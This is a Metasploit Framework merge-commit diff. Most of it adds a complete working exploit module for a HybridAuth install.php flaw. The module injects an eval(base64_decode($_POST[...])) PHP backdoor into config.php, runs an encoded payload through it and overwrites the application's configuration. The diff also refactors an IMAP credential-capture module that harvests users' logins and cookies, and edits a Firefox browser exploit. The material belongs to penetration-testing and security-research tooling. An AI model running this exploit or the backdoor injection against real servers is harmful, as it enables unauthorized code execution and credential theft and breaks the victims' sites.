Merge branch 'master' into aruba-testing

2014-08-20 20:06:40 -05:00 · 2014-08-20 20:06:40 -05:00 · 07ea8bedb5
parent 715f54b755 f9b902c6cc
commit 07ea8bedb5
5 changed files with 189 additions and 43 deletions
--- a/lib/metasploit/framework/command/base.rb
+++ b/lib/metasploit/framework/command/base.rb
@ -60,11 +60,6 @@ class Metasploit::Framework::Command::Base
    # the configuration from the parsed options.
    parsed_options.configure(Rails.application)

-    # support disabling the database
-    unless parsed_options.options.database.disable
-      Metasploit::Framework::Require.optionally_active_record_railtie
-    end
-
    Rails.application.require_environment!

    parsed_options
--- a/modules/auxiliary/server/capture/imap.rb
+++ b/modules/auxiliary/server/capture/imap.rb
@ -6,13 +6,11 @@

 require 'msf/core'

-
 class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::TcpServer
  include Msf::Auxiliary::Report

-
  def initialize
    super(
      'Name'        => 'Authentication Capture: IMAP',
@ -56,11 +54,11 @@ class Metasploit3 < Msf::Auxiliary

  def on_client_data(c)
    data = c.get_once
-    return if not data
-    num,cmd,arg = data.strip.split(/\s+/, 3)
+    return unless data
+    num, cmd, arg = data.strip.split(/\s+/, 3)
    arg ||= ""

-    if(cmd.upcase == "CAPABILITY")
+    if cmd.upcase == 'CAPABILITY'
      c.put "* CAPABILITY IMAP4 IMAP4rev1 IDLE LOGIN-REFERRALS " +
        "MAILBOX-REFERRALS NAMESPACE LITERAL+ UIDPLUS CHILDREN UNSELECT " +
        "QUOTA XLIST XYZZY LOGIN-REFERRALS AUTH=XYMCOOKIE AUTH=XYMCOOKIEB64 " +
@ -68,38 +66,26 @@ class Metasploit3 < Msf::Auxiliary
      c.put "#{num} OK CAPABILITY completed.\r\n"
    end

-    if(cmd.upcase == "AUTHENTICATE" and arg.upcase == "XYMPKI")
+    # Handle attempt to authenticate using Yahoo's magic cookie
+    # Used by iPhones and Zimbra
+    if cmd.upcase == 'AUTHENTICATE' && arg.upcase == 'XYMPKI'
      c.put "+ \r\n"
      cookie1 = c.get_once
      c.put "+ \r\n"
      cookie2 = c.get_once
-      report_auth_info(
-        :host      => @state[c][:ip],
-        :sname     => 'imap-yahoo',
-        :port      => datastore['SRVPORT'],
-        :source_type => "captured",
-        :user      => cookie1,
-        :pass      => cookie2
-      )
+      register_creds(@state[c][:ip], cookie1, cookie2, 'imap-yahoo')
      return
    end

-    if(cmd.upcase == "LOGIN")
+    if cmd.upcase == 'LOGIN'
      @state[c][:user], @state[c][:pass] = arg.split(/\s+/, 2)

-      report_auth_info(
-        :host      => @state[c][:ip],
-        :port      => datastore['SRVPORT'],
-        :sname     => 'imap',
-        :user      => @state[c][:user],
-        :pass      => @state[c][:pass],
-        :active    => true
-      )
+      register_creds(@state[c][:ip], @state[c][:user], @state[c][:pass], 'imap')
      print_status("IMAP LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}")
      return
    end

-    if(cmd.upcase == "LOGOUT")
+    if cmd.upcase == 'LOGOUT'
      c.put("* BYE IMAP4rev1 Server logging out\r\n")
      c.put("#{num} OK LOGOUT completed\r\n")
      return
@ -108,12 +94,43 @@ class Metasploit3 < Msf::Auxiliary
    @state[c][:pass] = data.strip
    c.put "#{num} NO LOGIN FAILURE\r\n"
    return
-
  end

  def on_client_close(c)
    @state.delete(c)
  end

+  def register_creds(client_ip, user, pass, service_name)
+    # Build service information
+    service_data = {
+      address: client_ip,
+      port: datastore['SRVPORT'],
+      service_name: service_name,
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }

+    # Build credential information
+    credential_data = {
+      origin_type: :service,
+      module_fullname: self.fullname,
+      private_data: pass,
+      private_type: :password,
+      username: user,
+      workspace_id: myworkspace_id
+    }
+
+    credential_data.merge!(service_data)
+    credential_core = create_credential(credential_data)
+
+    # Assemble the options hash for creating the Metasploit::Credential::Login object
+    login_data = {
+      core: credential_core,
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      workspace_id: myworkspace_id
+    }
+
+    login_data.merge!(service_data)
+    create_credential_login(login_data)
+  end
 end
--- a/modules/exploits/multi/browser/firefox_svg_plugin.rb
+++ b/modules/exploits/multi/browser/firefox_svg_plugin.rb
@ -10,16 +10,16 @@ class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::BrowserExploitServer
  include Msf::Exploit::EXE
-  include Msf::Exploit::Remote::BrowserAutopwn
+  # include Msf::Exploit::Remote::BrowserAutopwn
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

-  autopwn_info({
-    :ua_name    => HttpClients::FF,
-    :ua_minver  => "17.0",
-    :ua_maxver  => "17.0.1",
-    :javascript => true,
-    :rank       => NormalRanking
-  })
+  # autopwn_info({
+  #   :ua_name    => HttpClients::FF,
+  #   :ua_minver  => "17.0",
+  #   :ua_maxver  => "17.0.1",
+  #   :javascript => true,
+  #   :rank       => NormalRanking
+  # })

  def initialize(info = {})
    super(update_info(info,
--- a/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb
+++ b/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb
@ -0,0 +1,138 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ManualRanking # application config.php is overwritten
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'HybridAuth install.php PHP Code Execution',
+      'Description'    => %q{
+          This module exploits a PHP code execution vulnerability in
+        HybridAuth versions 2.0.9 to 2.2.2. The install file 'install.php'
+        is not removed after installation allowing unauthenticated users to
+        write PHP code to the application configuration file 'config.php'.
+
+        Note: This exploit will overwrite the application configuration file
+        rendering the application unusable.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Pichaya Morimoto', # Discovery and PoC
+          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
+        ],
+      'References'     =>
+        [
+          ['EDB', '34273'],
+          ['OSVDB','109838']
+        ],
+      'Arch'           => ARCH_PHP,
+      'Platform'       => 'php',
+      'Targets'        =>
+        [
+          # Tested:
+          # HybridAuth versions 2.0.9, 2.0.10, 2.0.11, 2.1.2, 2.2.2 on Apache/2.2.14 (Ubuntu)
+          ['HybridAuth version 2.0.9 to 2.2.2 (PHP Payload)', {}]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Aug 4 2014',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to HybridAuth library', '/hybridauth/'])
+      ], self.class)
+  end
+
+
+  #
+  # Check:
+  # * install.php exists
+  # * config.php is writable
+  # * HybridAuth version is 2.0.9 to 2.0.11, 2.1.x, or 2.2.0 to 2.2.2
+  #
+  def check
+    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'install.php')
+    if !res
+      vprint_error "#{peer} - Connection failed"
+      return Exploit::CheckCode::Unknown
+    elsif res.code == 404
+      vprint_error "#{peer} - Could not find install.php"
+    elsif res.body =~ />([^<]+)<\/span> must be <b >WRITABLE</
+      vprint_error "#{peer} - #{$1} is not writable"
+    elsif res.body =~ />HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</
+      version = res.body.scan(/>HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</).first.first
+      vprint_status "#{peer} - Found version: #{version}"
+      if version =~ /^2\.(0\.(9|10|11)|1\.[\d]+|2\.[012])/
+        return Exploit::CheckCode::Vulnerable
+      else
+        vprint_error "#{peer} - HybridAuth version #{version} is not vulnerable"
+      end
+    end
+    Exploit::CheckCode::Safe
+  end
+
+  #
+  # Exploit
+  #
+  def exploit
+    # check vuln
+    if check != Exploit::CheckCode::Vulnerable
+      fail_with Exploit::Failure::NotVulnerable, "#{peer} - Target is not vulnerable"
+    end
+
+    # write backdoor
+    print_status "#{peer} - Writing backdoor to config.php"
+    payload_param = rand(1000)
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, 'install.php'),
+      'data'   => "OPENID_ADAPTER_STATUS=eval(base64_decode($_POST[#{payload_param}])))));/*"
+    )
+    if !res
+      fail_with Failure::Unknown, "#{peer} - Connection failed"
+    elsif res.body =~ /Installation completed/
+      print_good "#{peer} - Wrote backdoor successfully"
+    else
+      fail_with Failure::UnexpectedReply, "#{peer} - Coud not write backdoor to 'config.php'"
+    end
+
+    # execute payload
+    code = Rex::Text.encode_base64(payload.encoded)
+    print_status "#{peer} - Sending payload to config.php backdoor (#{code.length} bytes)"
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, 'config.php'),
+      'data'   => "#{payload_param}=#{code}"
+    }, 5)
+    if !res
+      print_warning "#{peer} - No response"
+    elsif res.code == 404
+      fail_with Failure::NotFound, "#{peer} - Could not find config.php"
+    elsif res.code == 200 || res.code == 500
+      print_good "#{peer} - Sent payload successfully"
+    end
+
+    # remove backdoor
+    print_status "#{peer} - Removing backdoor from config.php"
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, 'install.php'),
+      'data'   => 'OPENID_ADAPTER_STATUS='
+    )
+    if !res
+      print_error "#{peer} - Connection failed"
+    elsif res.body =~ /Installation completed/
+      print_good "#{peer} - Removed backdoor successfully"
+    else
+      print_warning "#{peer} - Could not remove payload from config.php"
+    end
+  end
+end
--- a/6
+++ b/6
@ -1,13 +1,9 @@
 #!/usr/bin/env ruby
 # -*- coding: binary -*-
 #
-# $Id$
-#
 # This user interface provides users with a command console interface to the
 # framework.
 #
-# $Revision$
-#

 #
 # Standard Library
@ -20,7 +16,7 @@ require 'pathname'
 #

 # @see https://github.com/rails/rails/blob/v3.2.17/railties/lib/rails/generators/rails/app/templates/script/rails#L3-L5
-require Pathname.new(__FILE__).expand_path.parent.join('config', 'boot')
+require Pathname.new(__FILE__).realpath.expand_path.parent.join('config', 'boot')
 require 'metasploit/framework/command/console'

 Metasploit::Framework::Command::Console.start